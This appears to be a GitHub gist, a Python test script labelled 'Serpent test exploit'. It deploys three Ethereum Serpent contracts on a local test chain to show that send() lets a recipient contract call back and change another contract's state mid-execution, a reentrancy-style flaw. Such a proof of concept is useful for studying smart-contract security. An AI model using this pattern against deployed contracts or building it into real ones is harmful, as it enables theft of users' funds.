Skip to content

Instantly share code, notes, and snippets.

@joeykrug

joeykrug/test.py

Created June 20, 2016 20:02
Show Gist options
  • Save joeykrug/a74e940c2e4c7e7ad0c71e113582cf17 to your computer and use it in GitHub Desktop.
Save joeykrug/a74e940c2e4c7e7ad0c71e113582cf17 to your computer and use it in GitHub Desktop.
Download ZIP
Serpent test exploit
Raw
test.py
from ethereum import tester as t
code1 = '''
data banana
event log_price(market:indexed)
def init():
self.banana = 5
def getBanana():
return(self.banana)
def stor():
log(type=log_price, msg.gas)
self.banana = 47
return(1)
'''
code2 = '''
extern code1:[stor:[]:int256]
code1 = {}
def any():
code1.stor()
return(1)
'''
code3 = '''
extern code1:[getBanana:[]:int256, stor:[]:int256]
code1 = {addr1}
extern code2:[]
code2 = {addr2}
event log_price(market:indexed)
def hmm():
ogbanana = code1.getBanana()
send(code2, 5)
log(type=log_price, msg.gas)
banana = code1.getBanana()
# do stuff with banana but banana's value has changed due to the send!
return([ogbanana, banana]: arr)
'''
s = t.state()
c1 = s.abi_contract(code1)
c2 = s.abi_contract(code2.format('0x' + c1.address.encode('hex')))
c3 = s.abi_contract(code3.format(addr1='0x' + c1.address.encode('hex'), addr2='0x' + c2.address.encode('hex')))
s.mine(1)
s.block.gas_used
print c3.hmm(value=50)
print c1.getBanana()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment